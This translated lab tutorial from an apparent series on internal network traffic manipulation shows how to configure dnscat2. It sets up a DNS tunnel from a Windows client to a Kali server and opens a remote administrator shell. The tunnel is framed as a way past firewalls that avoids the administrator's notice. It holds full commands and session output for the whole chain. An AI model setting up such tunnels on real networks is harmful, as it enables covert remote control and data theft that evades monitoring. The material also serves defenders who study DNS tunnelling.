[Internal Network Traffic Manipulation Techniques, Part 5] dnscat2 Configuration

Preface

In the previous chapter we learned how to configure iodine to tunnel through a firewall over UDP port 53, which solved the problem that dns2tcp cannot be used on Windows. In practice, however, you often only get a single shell and are restricted to the command line, whereas iodine requires installing a virtual network adapter through the graphical interface when setting up the client. That is both cumbersome and noisy, and easily draws the administrator's attention. It is therefore worth taking a brief look at how dnscat2 is configured.


I. Topology

The principle behind the lab environment was explained in detail earlier and is not repeated here.

II. Server configuration

1. Install the dependencies and dnscat2

root@kali:~# apt-get update
root@kali:~# apt-get -y install ruby-dev git make g++
root@kali:~# gem install bundler
root@kali:~# git clone https://github.com/iagox86/dnscat2.git
root@kali:~# cd dnscat2/server
root@kali:~/dnscat2/server# bundle install
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your
bundle as root will break this application for all non-root users on this machine.        
Fetching gem metadata from https://rubygems.org/.......
Using bundler 2.1.4
Fetching ecdsa 1.2.0
Installing ecdsa 1.2.0
Fetching salsa20 0.1.1
Installing salsa20 0.1.1 with native extensions
Fetching sha3 1.0.1
Installing sha3 1.0.1 with native extensions
Fetching trollop 2.1.2
Installing trollop 2.1.2
Bundle complete! 4 Gemfile dependencies, 5 gems now installed.
Use `bundle info [gemname]` to see where a bundled gem is installed.

If you see the output above, the installation succeeded. I ran into a pitfall during installation: I was originally using Kali 2020.1, which produced errors. Not being familiar with Ruby, I updated to Kali 2020.4 and the installation succeeded.

2. Start the server

Run the following command on 192.168.0.164 (kali.redwand.com):

┌──(root💀kali20204)-[~/dnscat2/server]
└─# ruby dnscat2.rb test.redwand.com --secret=passwd --no-cache

New window created: 0
New window created: crypto-debug
dnscat2> Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = test.redwand.com]...

Assuming you have an authoritative DNS server, you can run
the client anywhere with the following (--secret is optional):

  ./dnscat --secret=passwd test.redwand.com

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=passwd

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

III. Client configuration

Client download address:
https://downloads.skullsecurity.org/dnscat2
You can download the precompiled binary and use it directly after extracting it. The command run in this experiment is:

C:\Documents and Settings\Administrator\桌面\dnscat2-v0.07-client-win32>dnscat2-v0.07-client-win32.exe --dns server=kali.redwand.com --secret=passwd
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = kali.redwand.com

** Peer verified with pre-shared secret!

Session established!

Note that --dns server=kali.redwand.com must not be written as test.redwand.com: this parameter names the authoritative DNS server that resolves the tunnel domain, not the parent server that delegates to it.
Once the server reports a successful connection, use the shell command to create a new window, then switch to that window to get a shell.

dnscat2> window -i 1
New window created: 1
history_size (session) => 1000
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (qd-4f18765d03a8) 1> shell
Sent request to execute a shell
command (qd-4f18765d03a8) 1> New window created: 2
Shell session created!

command (qd-4f18765d03a8) 1> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面\dnscat2-v0.07-client-win32>whoami
cmd.exe (qd-4f18765d03a8) 2> whoami
qd-4f18765d03a8\administrator


Summary

Today we took a brief look at using dnscat2. Its principle is the same as the DNS tunnels covered earlier; only some specific configuration details have small pitfalls. Further detailed usage can be learned in practice.
